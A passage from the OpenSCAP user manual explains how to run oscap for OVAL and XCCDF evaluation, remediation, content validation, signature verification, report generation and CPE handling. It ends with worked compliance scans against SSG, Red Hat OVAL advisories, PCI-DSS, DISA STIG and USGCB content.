collection, run the\nfollowing command:\n---------------------------------------------------------------------------------------------------\n$ oscap oval eval --datastream-id ds.xml --oval-id xccdf.xml --results oval-results.xml scap-ds.xml\n---------------------------------------------------------------------------------------------------\nWhere *ds.xml* is the given data stream, *xccdf.xml* is an XCCDF file\nspecifying the OVAL component, *oval-results.xml* is the OVAL Result\nfile, and *scap-ds.xml* is a file representing the SCAP data stream\ncollection.\n\n\nWhen the SCAP content is represented by multiple XML files, the OVAL\nDefinition file can be distributed along with the XCCDF file. In such a\nsituation, OVAL Definitions may depend on variables that are exported\nfrom the XCCDF file during the scan, and separate evaluation of the OVAL\ndefinition(s) would produce misleading results. Therefore, any external\nvariables has to be exported to a special file that is used during the\nOVAL definitions evaluation. The following commands are examples of this\nscenario:\n\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\nWhere *united_states_government_configuration_baseline* represents a\nprofile in the XCCDF document, *usgcb-rhel5desktop-xccdf.xml* is a file\nspecifying the XCCDF document, *usgcb-rhel5desktop-oval.xml* is the OVAL\nDefinition file, *usgcb-rhel5desktop-oval.xml-0.variables-0.xml* is the\nfile containing exported variables from the XCCDF file, and\n*usgcb-results-oval.xml* is the the OVAL Result file.\n\n==== XCCDF\nWhen evaluating an XCCDF benchmark, ```oscap``` usually processes an XCCDF\nfile, an OVAL file and the CPE dictionary. It performs system\nanalysis and produces XCCDF results based on this analysis. The results\nof the scan do not have to be saved in a separate file but can be\nattached to the XCCDF file. The evaluation result of each XCCDF rule\nwithin an XCCDF checklist is printed to standard output stream. The CVE\nand CCE identifiers associated with the rules are printed as well. The\nfollowing is a sample output for a single XCCDF rule:\n\n----\nTitle Verify permissions on 'group' file\nRule usgcb-rhel5desktop-rule-2.2.3.1.j\nIdent CCE-3967-7\nResult pass\n----\n\nThe CPE dictionary is used to determine whether the content is\napplicable on the target platform or not. Any content that is not\napplicable will result in each relevant XCCDF rule being evaluated to\n\"notapplicable\".\n\nThe following examples show the most common scenarios of XCCDF benchmark\nevaluation:\n\n* To evaluate a specific profile in an XCCDF file run this command:\n\n----\n$ oscap xccdf eval --profile Desktop --results xccdf-results.xml --cpe cpe-dictionary.xml scap-xccdf.xml\n----\n\nWhere *scap-xccdf.xml* is the XCCDF document, *Desktop* is the selected\nprofile from the XCCDF document, *xccdf-results.xml* is a file storing\nthe scan results, and *cpe-dictionary.xml* is the CPE dictionary.\n\n\n* To evaluate a specific XCCDF benchmark that is part of a data stream\nwithin a SCAP data stream collection run the following command:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is ID of\nthe component-ref pointing to the desired XCCDF document, and\n*xccdf-results.xml* is a file containing the scan results.\n\nNOTE: If you omit ```--datastream-id``` on the command line, the first data\nstream from the collection will be used. If you omit ```--xccdf-id```, the\nfirst component from the checklists element will be used. If you omit\nboth, the first data stream that has a component in the checklists\nelement will be used - the first component in its checklists element\nwill be used.\n\n\n* (Alternative, not recommended) To evaluate a specific XCCDF benchmark\nthat is part of a data stream within a SCAP data stream collection run\nthe following command:\n\n--------------------------------------------------------------------------------------\n$ oscap xccdf eval --benchmark-id benchmark_id --results xccdf-results.xml scap-ds.xml\n--------------------------------------------------------------------------------------\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *benchmark_id* is a string matching the \"id\" attribute of\nxccdf:Benchmark containing in a component, and *xccdf-results.xml* is a\nfile containing the scan results.\n\n=== Remediate System\nOpenSCAP allows to automatically remediate systems that have been found in a\nnon-compliant state. For system remediation, an XCCDF file with instructions is\nrequired. The _scap-security-guide_ package constains certain remediation\ninstructions.\n\nSystem remediation consists of the following steps:\n\n . ```oscap``` performs a regular XCCDF evaluation.\n . An assessment of the results is performed by evaluating the OVAL definitions.\n Each rule that has failed is marked as a candidate for remediation.\n . ```oscap``` searches for an appropriate fix element, resolves it, prepares the\n environment, and executes the fix script.\n . Any output of the fix script is captured by ```oscap``` and stored within the\n *rule-result* element. The return value of the fix script is stored as well.\n . Whenever ```oscap``` executes a fix script, it immediatelly evaluates the OVAL\n definition again (to verify that the fix script has been applied correctly).\n During this second run, if the OVAL evaluation returns success, the result of\n the rule is *fixed*, otherwise it is an *error*.\n . Detailed results of the remediation are stored in an output XCCDF file. It\n contains two *TestResult* elements. The first *TestResult* element represents the\n scan prior to the remediation. The second *TestResult* is derived from the first\n one and contains remediation results.\n\nThere are three modes of operation of ```oscap``` with regard to remediation:\nonline, offline, and review.\n\n==== Online Remediation\nOnline remediation executes fix elements at the time of scanning. Evaluation and\nremediation are performed as a part of a single command.\n\nTo enable online remediation, use the ```--remediate``` command-line option. For\nexample, to execute online remediation using the _scap-security-guide_ package,\nrun:\n\n----\n$ oscap xccdf eval --remediate --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\nThe output of this command consists of two sections. The first section shows the\nresult of the scan prior to the remediation, and the second section shows the\nresult of the scan after applying the remediation. The second part can contain\nonly *fixed* and *error* results. The *fixed* result indicates that the scan performed\nafter the remediation passed. The *error* result indicates that even after\napplying the remediation, the evaluation still does not pass.\n\n==== Offline Remediation\nOffline remediation allows you to postpone fix execution. In first step, the\nsystem is only evaluated, and the results are stored in a *TestResult* element in\nan XCCDF file.\n\nIn the second step, ```oscap``` executes the fix scripts and verifies the result. It\nis safe to store the results into the input file, no data will be lost. During\noffline remediation, a new *TestResult* element is created that is based\non the input one and inherits all the data. The newly created *TestResult*\ndiffers only in the *rule-result* elements that have failed. For those,\nremediation is executed.\n\nTo perform offline remediation using the _scap-security-guide_ package, run:\n\n----\n$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n----\n$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml\n----\n\n==== Remediation Review\nThe review mode allows users to store remediation instructions to a file for\nfurther review. The remediation content is not executed during this operation.\nTo generate remediation instructions in the form of a shell script, run:\n\n $ oscap xccdf generate fix --template urn:xccdf:fix:script:sh --profile xccdf_org.ssgproject.content_profile_rht-ccp --output my-remediation-script.sh \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n\n=== Check Engines\nMost XCCDF content uses the OVAL check engine. This is when OVAL\nDefinitions are being evaluated in order to assess a system. Complete\ninformation of an evaluation is recorded in OVAL Results files, as\ndefined by the OVAL specification. By examining these files it's\npossible check what definitions were used for the evaluation and why the\nresults are as they are. Please note these files are not generated\nunless *--oval-results* is used.\n\nSome content may use alternative check engines, for example the\n{sce_web}[SCE] check engine.\n\nResults of rules with a check that requires a check engine not supported\nby OpenSCAP will be reported as *notchecked*. Check contents are not\nread or interpreted in any way unless the check system is known and\nsupported. Following is an evaluation output of an XCCDF with unknown\ncheck system:\n\n--------------------------------------------------------\n$ oscap xccdf eval sds-datastream.xml\n\nTitle Check group file contents\nRule xccdf_org.example_rule_system_authcontent-group\nResult notchecked\n\nTitle Check password file contents\nRule xccdf_org.example_rule_system_authcontent-passwd\nResult notchecked\n\nTitle Check shadow file contents\nRule xccdf_org.example_rule_system_authcontent-shadow\nResult notchecked\n\n...\n--------------------------------------------------------\n\nNOTE: The *notchecked* result is also reported for rules that have no\ncheck implemented. *notchecked* means that there was no check in that\nparticular rule that could be evaluated.\n\n\n==== CVE, CCE and other identifiers\nEach XCCDF Rule can have xccdf:ident elements inside. These elements\nallow the content creator to reference various external identifiers like\nCVE, CCE and others.\n\nWhen scanning, oscap output identifiers of scanned rules regardless of\ntheir results. For example:\n\n------------------------------------------------------------------------\nTitle Ensure Repodata Signature Checking is Not Disabled For Any Repos\nRule rule-2.1.2.3.6.a\nResult pass\n\nTitle Verify user who owns 'shadow' file\nRule rule-2.2.3.1.a\nIdent CCE-3918-0\nResult pass\n\nTitle Verify group who owns 'shadow' file\nRule rule-2.2.3.1.b\nIdent CCE-3988-3\nResult pass\n------------------------------------------------------------------------\n\nAll identifiers (if any) are printed to stdout for each rule. Since\nstandard output doesn't allow for compact identifier metadata to be\ndisplayed, only the identifiers themselves are displayed there.\n\nIdentifiers are also part of the HTML report output. If the identifier\nis a CVE you can click it to display its metadata from the official NVD\ndatabase (requires internet connection). OpenSCAP doesn't provide\nmetadata for other types of identifiers.\n\n==== Bundled CCE data\nOpenSCAP does not provide any static or product bundled CCE data. Thus\nit has no way of displaying the last generated, updated and officially\npublished dates of static or product bundled CCE data because the dates\nare not defined.\n\n\n\n\n== Advanced oscap usage\n\n=== Validating SCAP Content\nBefore you start using a security policy on your systems, you should first\nverify the policy in order to avoid any possible syntax or semantic errors in\nthe policy. The ```oscap``` tool can be used to validate the security content\nagainst standard SCAP XML schemas. The validation results are printed to the\nstandard error stream (stderr). The general syntax of such a validation command\nis the following:\n\n $ scap module validate [module_options_and_arguments] file\n\nwhere file is the full path to the file being validated. As a ```module``` you\ncan use:\n\n * xccdf,\n * oval,\n * cpe or\n * cve.\n\nThe only exception is the data stream module (ds), which uses the sds-validate\noperation instead of validate. So for example, it would be like:\n\n $ oscap ds sds-validate scap-ds.xml\n\nNOTE: Note that all SCAP components within the given data stream are validated\nautomatically and none of the components is specified separately.\n\nYou can also enable extra Schematron-based validation if you validate OVAL\nspecification. This validation method is slower but it provides deeper analysis.\nRun the following command to validate an OVAL document using Schematron:\n\n $ oscap oval validate --schematron oval-file.xml\n\nThe results of validation are printed to standard error stream (stderr).\n\nNOTE: Please note that for the rest of ```oscap``` functionality, unless you specify\n--skip-valid, validation will automatically occur before files are used.\nTherefore, you do not need to explicitly validate a datastream before\nuse.\n\n\n=== SCAP Content Signing and Signature Verification\nThe ```oscap``` itself does not do signature verification. It skips over the\nrespective elements. This is due to the fact that there are way too many options\nwhen it comes to keystores and crypto choices. Instead we recommend users to use\n{xmlsec}[xmlsec1] to verify their SCAP content. Safely evaluating signed\ncontent (with signature verification) involves the following steps:\n\n1) Install xmlsec1 and at least one of its crypto engines\n-------------------------------------\n# yum install xmlsec1 xmlsec1-openssl\n-------------------------------------\n\n2) Run ```xmlsec1 --verify``` on the content:\n\nThis simple example will only show 2 specific cases of verifying the\nsignature, the steps may vary depending on which technique was used to\nsign the datastream.\n\nAssuming the datastream was signed with a private key and we have the\nrespective public key to verify it with:\n\n------------------------------------------------------\n$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml\n------------------------------------------------------\n\nAssuming the datastream was signed with a certificate and we have the\nrespective public part of the certificate to verify it with:\n\n---------------------------------------------------------------\n$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml\n---------------------------------------------------------------\n\nThere are countless other options, for more details see: ```xmlsec1\n--help-verify```\n\nSuccessful output should look similar to this:\n\n-----------------------------------------------------\n$ xmlsec1 verify --pubkey-pem key.pub datastream.xml\nOK\nSignedInfo References (ok\/all): 1\/1\nManifests References (ok\/all): 0\/0\n-----------------------------------------------------\n\nAnd the exit code must be 0 before proceeding.\n\n3) If the previous steps resulted in successful verification, proceed\nby evaluating the datastream:\n\n---------------------------------\n$ oscap xccdf eval datastream.xml\n---------------------------------\n\nNOTE: If you want to experiment with various crypto engines of xmlsec1, see\n ```xmlsec1-config --help```\n\n\n=== Generating Reports and Guides\nAnother useful features of ```oscap``` is the ability to generate SCAP content in a\nhuman-readable format. It allows you to transform an XML file\ninto HTML or plain-text format. This feature is used to generate security\nguides and checklists, which serve as a source of information, as well as\nguidance for secure system configuration. The results of system scans can also\nbe transformed to well-readable result reports. The general command syntax is\nthe following:\n\n $ oscap module generate sub-module [specific_module\/sub-module_options_and_arguments] file\n\nwhere module is either ```xccdf``` or ```oval```, ```sub-module``` is a type of\nthe generated document, and file represents an XCCDF or OVAL file. A sub-module\ncan be either ```report```, ```guide```, ```custom``` or ```fix```. Please see\n ```man oscap``` for more details.\n\n\n=== Content Transformation\nThe oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet\nLanguage Transformations) language, which allows transformation of a SCAP\ncontent XML file into another XML, HTML, plain text or {xsl}[XSL] document.\nThis feature is very useful when you need the SCAP document in a\nhuman-readable form. The following commands represent the most common\ncases:\n\n* Creating a guide (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide.html[example]):\n--------------------------------------------------------\n$ oscap xccdf generate guide scap-xccdf.xml > guide.html\n--------------------------------------------------------\n\n* Creating a guide with profile checklist (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/guide-checklist.html[example]):\n------------------------------------------------------------------------------------\n$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html\n------------------------------------------------------------------------------------\n\n* Generating the XCCDF scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf.html[example]):\n-------------------------------------------------------------------\n$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html\n-------------------------------------------------------------------\n\n* Generating the OVAL scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-oval.html[example]):\n----------------------------------------------------------------\n$ oscap oval generate report oval-results.xml > report-oval.html\n----------------------------------------------------------------\n\n* Generating the XCCDF report with additional information from failed\nOVAL tests (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf-oval.html[example]):\n----\n$ oscap xccdf generate report --oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html\n----\n\n\n=== CPE applicability\nXCCDF rules in the content may target only specific platforms and hold\nno meaning on other platforms. Such an XCCDF rule contains an\n*<xccdf:platform>* element in its body. This element references a CPE\nname or CPE2 platform (defined using **cpe2:platform-specification**)\nthat could be defined in a CPE dictionary file or a CPE language file\nor it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is\ndeemed applicable if at least one of the listed platforms is applicable.\nIf an XCCDF rule contains no *<xccdf:platform>* elements it is considered\nalways applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n ```--cpe``` option and ```oscap``` auto-detects format of the file. The following\ncommand is an example of the XCCDF content evaluation using CPE name\nfrom an external file:\n\n-----------------------------------------------------------------------------------------\n$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml\n-----------------------------------------------------------------------------------------\n\nWhere *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file\ncontaining the scan results, and *external-cpe-file.xml* is the CPE\ndictionary or a language file.\n\nIf you are evaluating a source data stream, ```oscap``` automatically\nregisters all CPEs contained within the data stream. No extra steps have\nto be taken. You can also register an additional external CPE file, as\nshown by the command below:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the\nXCCDF document, *xccdf-results.xml* is a file containing the scan\nresults, and *additional-external-cpe.xml* is the additional CPE\ndictionary or language file.\n\nThe ```oscap``` tool will use an OVAL file attached to the CPE dictionary to\ndetermine applicability of any CPE name in the dictionary.\n\nApart from the instructions above, no extra steps have to be taken for\ncontent using *cpe:fact-ref* or **cpe2:fact-ref**. See the following\nsections for details on resolving.\n\n==== xccdf:platform applicability resolution\n\nWhen a CPE name or language model platform is referenced via\n*<xccdf:platform>* elements, resolution happens in the following order:\n\n . Look into embedded CPE2 language model if name is found and applicable deem\n it applicable\n . If not found or not applicable, look into external CPE2 language models\n (order of registration)\n . If not found or not applicable, look into embedded CPE dictionary\n . If not found or not applicable, look into external CPE dictionaries (order of\n registration)\n\nIf the CPE name is not found in any of the sources, it is deemed not\napplicable. If it is found in any of the sources but not applicable, we\nlook for it elsewhere.\n\n==== cpe:fact-ref and cpe2:fact-ref resolution\n\nCPE name referenced from within fact-ref is resolved in the following\norder:\n\n. Look into embedded CPE dictionary, if name is found and applicable\ndeem it applicable\n. If not found or not applicable, look into external CPE dictionaries\n(order of registration)\n\n==== Built-in CPE Naming Dictionary\n\nApart from the external CPE Dictionaries, ```oscap``` comes with an inbuilt\nCPE Dictionary. The built-in CPE Dictionary contains only a few products\n(sub-set of http:\/\/nvd.nist.gov\/cpe.cfm[Official CPE Dictionary]) and it\nis used as a fall-back option when there is no other CPE source found.\n\nThe list of inbuilt CPE names can be found in the output of\n\n-----------------\n$ oscap --version\n-----------------\n\nYou can file a request to include any additional product in the built-in\ndictionary via https:\/\/www.redhat.com\/mailman\/listinfo\/open-scap-list[open-scap\nmailing list] or\nhttps:\/\/bugzilla.redhat.com\/enter_bug.cgi?product=Fedora[bugzilla].\n\n\n=== Notes on the Concept of Multiple OVAL Values\nThis section describes advanced concepts of OVAL Variables and their\nimplementation in ```oscap```. The SCAP specification allows for an OVAL\nvariable to have multiple values during a single assessment run. There\nare two variable modes which can be combined:\n\n* Multival -- A variable is assigned with multiple values at the same\ntime. As an example, consider a variable which refers to preferred\npermission of a given file, that may take multiple values like: '600',\n'400'. The evaluation tries to match each (or all) and then outputs a\nsingle OVAL Definition result.\n* Multiset -- A variable is assigned with a different value (or\nmultival) for different evaluations. This is known as a\n*variable_instance*. As an example consider an OVAL definition which\nchecks that a package given by a variable is not installed. For the first\nevaluation of the definition, the variable can be assigned with\n'telnet-server' value, for second time the variable can be assigned with\n'tftp-server' value. Therefore both evaluations may output different\nresults. Thus, the OVAL Results file may contain multiple results for\nthe same definition, these are distinguished by *variable_instance*\nattribute.\n\nThese two concepts are a source of confusion for both the content\nauthors and the result consumers. On one hand, the first concept is well\nsupported by the standard and the OVAL Variable file format. It allows\nmultiple *<value>* elements for each *<variable>* element. On the other\nhand, the second concept is not supported by an OVAL Variable schema\nwhich prevents fully automated evaluation of the multisets (unless you\nuse XCCDF to bridge that gap).\n\nTIP: ```oscap``` supports both variable modes as described below.\n\n==== Sources of Variable Values\nFirst we need to understand how a single value can be bound to a\nvariable in the OVAL checking engine. There are three ways to do this:\n\n1) OVAL Variables File -- The values of external variables can be\ndefined in an external file. Such a file is called an OVAL Variable File\nand can be recognized by using the following command: `oscap info\nfile.xml`. The OVAL Variables file can be passed to the evaluation by\n ```--variables``` argument such as:\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\n\n2) XCCDF Bindings -- The values of external variables can be given from\nan XCCDF file. In the XCCDF file within each *<xccdf:check>* element,\nthere might be *<xccdf:check-export>* elements. These elements allow\ntransition of *<xccdf:value>* elements to *<oval:variables>* elements. The\nfollowing command allows users to export variable bindings from XCCDF to\nan OVAL Variables file:\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n\n3) Values within an OVAL Definition File -- Variables' values defined\ndirectly in the OVAL definitions file *<constant_variable>* and\n*<local_variable>* elements.\n\n==== Evaluation of Multiple OVAL Values\nWith ```oscap```, there are two possible ways how two or more values can be\nspecified for a variable used by one OVAL definition. The approach you choose\ndepends on what mode you want to use, multival or multiset.\n\nThe ```oscap``` handles multiple OVAL values seemlessly; such that user doesn't\nneed to do anything differently than what she (or he) does for a normal scan.\nThe command below demonstrates evaluation of DataStream, which may include\nmultiset, multival, or both concepts combined, or none of them.\n----\n$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\n==== Multival\nMultival can pass multiple values to a single OVAL definition\nevaluation. This can be accomplished by all three ways as described in\nprevious section.\n\n1) OVAL Variables file -- This option is straight forward. The file\nformat (XSD schema) allows for multiple *<value>* elements within each\n*<variable>* element.\n\n--------------------------------------------------------------------------------\n <variable id=\"oval:com.example.www:var:1\" datatype=\"string\" comment=\"Unknown\">\n <value>600<\/value>\n <value>400<\/value>\n <\/variable>\n--------------------------------------------------------------------------------\n\n2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* referring to the\nvery same OVAL variable binding with multiple different XCCDF values.\n-----------------------------------------------------------------------------------------------------\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_com.example.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-export value-id=\"xccdf_com.example.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n-----------------------------------------------------------------------------------------------------\n\n3) Values within OVAL Definitions file -- This is similar to using a\nVariables file, there are multiple *<value>* elements allowed within\n*<constant_variable>* or *<local_variable>* elements.\n\n==== Multiset\nMultiset allows for the very same OVAL definition to be evaluated\nmultiple times using different values assigned to the variables for each\nevaluation. In OpenSCAP, this is only possible by option (2) XCCDF\nBindings. The following XCCDF snippet evaluates twice the very same OVAL\nDefinition, each time it binds a different value to the OVAL variable.\n\n-------------------------------------------------------------------------------------------------------\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_1\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_2\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n-------------------------------------------------------------------------------------------------------\n\nAfter the evaluation, the OVAL results file will contain multiple\nresult-definitions and multiple result-tests and multiple\ncollected-objects. The elements of the same id will be differentiated by\nthe value of the *variable_instance* attribute. Each of the\ndefinitions\/tests\/object might have a different result of evaluation.\nThe following snippet of OVAL results file illustrates output of a\nmultiset evaluation.\n\n----\n <tests>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"true\" variable_instance=\"1\">\n <tested_item item_id=\"1117551\" result=\"true\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">600<\/tested_variable>\n <\/test>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"false\" variable_instance=\"2\">\n <tested_item item_id=\"1117551\" result=\"false\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">400<\/tested_variable>\n <\/test>\n <\/tests>\n----\n\n\n\n\n== Practical Examples\nThis section demonstrates practical usage of certain security content provided\nfor Red Hat products.\n\nThese practical examples show usage of industry standard checklists that\nwere validated by NIST.\n\n=== Auditing System Settings with SCAP Security Guide\nThe SSG project contains guidance for settings of Red Hat Enterprise Linux 7.\n\n1) Install the SSG\n\n $ sudo yum install -y scap-security-guide\n\n2) To inspect the security content use the ```oscap info``` module:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\nThe output of this command contains available configuration profiles. To audit\nyour system settings choose the\n ```xccdf_org.ssgproject.content_profile_rht-ccp``` profile and run the\nevaluation command . For example, the The following command is used to assess\nthe given system against a draft SCAP profile for Red Hat Certified Cloud\nProviders:\n\n $ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp\n--results ssg-rhel7-xccdf-result.xml --report ssg-rhel7-report.html\n\/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\n\n=== Auditing Security Vulnerabilities of Red Hat Products\nThe Red Hat Security Response Team provides OVAL definitions for all\nvulnerabilities (identified by CVE name) that affect Red Hat Enterprise\nLinux 3, 4, 5, 6 and 7. This enable users to perform a vulnerability scan\nand diagnose whether system is vulnerable or not.\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget http:\/\/www.redhat.com\/security\/data\/metrics\/com.redhat.rhsa-all.xccdf.xml\n$ wget http:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml\n--------------------------------------------------------------------------------------------\n\nThis is a sample output. It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issues but update was not applied so a\nsystem is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,\nCVE-2013-2017)\n\n------------------------------------------------------------------------------------\nTitle RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)\nRule oval-com.redhat.rhsa-def-20130911\nIdent CVE-2013-1935\nIdent CVE-2013-1943\nIdent CVE-2013-2017\nResult fail\n------------------------------------------------------------------------------------\n\nNOTE: Note that these OVAL definitions are designed to only cover software and\nupdates released by Red Hat. You need to provide additional definitions in order\nto detect the patch status of third-party software.\n\n\nHuman readable report *report.html* is generated by side with \"machine\"\nreadable report **results.xml**. Both files hold information about\nvulnerability status of scanned system. They map RHSA to CVEs and report\nwhat security advisories are not applied. CVE identifiers are linked\nwith National Vulnerability Databases where additional information like:\nCVE description, CVSS score, CVSS vector, etc. are stored.\n\nTo find out more information about this project, see\nhttp:\/\/www.redhat.com\/security\/data\/metrics\/.\n\n\n=== How to Evaluate PCI-DSS on RHEL7\nThis section describes how to evaluate the Payment Card Industry Data Security\nStandard (PCI-DSS) on Red Hat Enterprise Linux 7.\n\n1) Install SSG which provides the PCI-DSS SCAP content\n\n $ sudo yum install -y scap-security-guide\n\n2) Verify that the PCI-DSS profile is present\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n3) Evaluate the PCI-DSS content\n\n $ oscap xccdf eval --results results.xml --profile xccdf_org.ssgproject.content_profile_pci-dss \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n4) Generate report readable in a web browser.\n\n $ oscap xccdf generate report --output report.html results.xml\n\n=== How to Evaluate DISA STIG\nThis section describes how to evaluate the Defense Information Systems Agency\n(DISA) Security Technical Implementation Guide (STIG) on Red Hat Eneterprise\nLinux 6.\n\n1) Download the DISA STIG content.\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n2) Unpack the content.\n---------------------------------------------------\n$ unzip U_RedHat_6_V1R8_STIG.zip\n---------------------------------------------------\n\n3) Fix the content using a sed substitution.\n---------------------------------------------------------------------------------------------------\n$ sed -i 's\/<Group\\ \\(.*\\)\/<Group\\ selected=\"false\"\\ \\1\/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n---------------------------------------------------------------------------------------------------\n\nNOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF\nspecification 1.2] the ```selected``` attribute for *Rule* or *Group* is *true* by default.\nIt means that if you create a new profile even with only one rule selected, all\nrules within the benchmark will be evaluated because they are set to true by default. The\nsubstitution will set all Groups as unselected by default which means all\ndescendants will also be unselected by default.\n\n4) Display a list of available profiles.\n\n $ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n\n5) Evaluate your favorite profile, for example *MAC-1_Public*, and write\nXCCDF results into the results.xml file.\n----\n$ oscap xccdf eval --profile MAC-1_Public --results results.xml --cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n6) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nIf you are interested in DISA STIG content for RHEL5 or RHEL7 please visit\n{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 6*\nor *Red Hat Enterprise Linux 7* as a target product.\n\n=== How to Evaluate United States Government Configuration Baseline (USGCB)\nNOTE: NIST offers no official USGCB for RHEL6 as of September 2014 but you can\nacquire the content from the {ssg_git}[SSG] project.\n\nThe USGCB content for represents Tier IV Checklist for Red Hat\nEnterprise Linux 5 (as defined by NIST Special Publication 800-70).\n\nWARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1\nor later.\n\nAfter ensuring that version of OpenSCAP on your system is\nsufficient, perform the following tasks:\n\n1) Download the USGCB content.\n------------------------------------------------------------------------------\n$ wget http:\/\/usgcb.nist.gov\/usgcb\/content\/scap\/USGCB-rhel5desktop-1.2.5.0.zip\n------------------------------------------------------------------------------\n\n2) Unpack the USGCB content.\n--------------------------------------\n$ unzip USGCB-rhel5desktop-1.2.5.0.zip\n--------------------------------------\n\n3) Run evaluation of the USGCB content.\n----\n$ oscap xccdf eval --profile united_states_government_configuration_baseline --cpe usgcb-rhel5desktop-cpe-dictionary.xml --oval-results --fetch-remote-resources --results results.xml usgcb-rhel5desktop-xccdf.xml\n----\n\n4) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nAdditional reports can be generated from detailed OVAL result files.\nScanner outputs OVAL results files in the current directory, for each\nOVAL file on input there is one output. In case of USGCB, there is\none OVAL file distributed along the XCCDF, another one which is\ndownloaded from Red Hat Repository. The latter contains CVE information\nfor each evaluated definition.\n\n----\n$ oscap oval generate report --output 